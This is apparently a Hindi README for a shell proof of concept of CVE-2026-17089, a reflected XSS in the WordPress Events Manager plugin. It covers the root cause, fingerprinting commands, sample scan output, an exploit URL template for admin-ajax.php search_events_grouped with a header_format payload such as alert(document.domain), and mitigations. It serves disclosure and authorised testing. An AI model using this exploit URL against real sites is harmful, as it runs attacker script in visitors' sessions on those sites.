CVE-2026-17089 के लिए Shell PoC, WordPress Events Manager plugin (<= 7.4.0.1) में एक unauthenticated reflected XSS; plugin की fingerprinting करता है और header_format reflection का परीक्षण करता है।
<= 7.4.0.1 — अनधिकृत प्रतिबिंबित XSS (header_format)लेखक: pwnVader · लाइसेंस: MIT (रिपॉज़िटरी रूट)
| घटक | Events Manager – Calendar, Bookings, Tickets, and more! (WordPress प्लगइन) |
| प्रकार | CWE-79 — प्रतिबिंबित क्रॉस-साइट स्क्रिप्टिंग |
| प्रभावित | <= 7.4.0.1 |
| ठीक किया गया | बाद का 7.4.x रिलीज़ (EM_Events::output_grouped() में wp_kses_post() लागू) |
| CVE | CVE-2026-17089 — CVSS 3.1 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) |
| PoC | poc.sh |
शॉर्टकोड प्रवेश बिंदु header_format को wp_kses() से सैनिटाइज़ करता है, लेकिन अनधिकृत
AJAX एक्शन search_events_grouped उस सैनिटाइज़ेशन को बायपास करता है और मान को HTML प्रतिक्रिया
में प्रतिध्वनित करता है (EM_Events::output_grouped())। एक दूरस्थ, अनधिकृत हमलावर एक URL तैयार
कर सकता है जो प्रभावित साइट के ओरिजिन में मनमाना JavaScript निष्पादित करता है, उस किसी भी उपयोगकर्ता
के लिए जो इसे खोलता है (UI:R)।
# Interactive menu
./poc.sh
# Read-only: fingerprint the plugin and test the unescaped reflection
./poc.sh check --target https://example.com
# Print the exploit URL (open it in a browser; the script runs in the target origin)
./poc.sh url --target https://example.com --payload "alert(document.domain)"
check)== CVE-2026-17089 PoC (check) ==
target: https://example.com
[1] Plugin fingerprint (read-only)
[PASS] Events Manager assets are served (plugin installed)
[info] Stable tag: 7.1.7
[PASS] version 7.1.7 is in the affected range (<= 7.4.0.1)
[2] Unauthenticated reflection test (read-only, benign marker)
[PASS] endpoint reflected header_format UNESCAPED (the raw is in the response)
== RESULT: 3 PASS / 0 FAIL ==
VULNERABLE to CVE-2026-17089 (unauthenticated reflected XSS).
https://example.com/wp-admin/admin-ajax.php?action=search_events_grouped&scope=all&limit=5&header_format=<urlencoded payload>
readme.txt (Stable tag) और/या प्लगइन एसेट पथ
/wp-content/plugins/events-manager/includes/js/events-manager.js।admin-ajax.php?action=search_events_grouped पर भेजें, जिसमें header_format मार्कर पर सेट हो, और
जाँचें कि क्या कच्चा मार्कअप प्रतिक्रिया बॉडी में बिना एस्केप के प्रतिबिंबित होता है।header_format पर
wp_kses_post() लागू करता है, जो हर कॉलर को कवर करता है)।search_events_grouped AJAX एक्शन को ब्लॉक करें या WAF/एप्लिकेशन स्तर पर
header_format को फ़िल्टर करें।केवल अधिकृत सुरक्षा परीक्षण के लिए। PoC रीड-ओनली है (check) या एक URL प्रिंट करता है (url); कोई
डेटा संशोधित नहीं होता।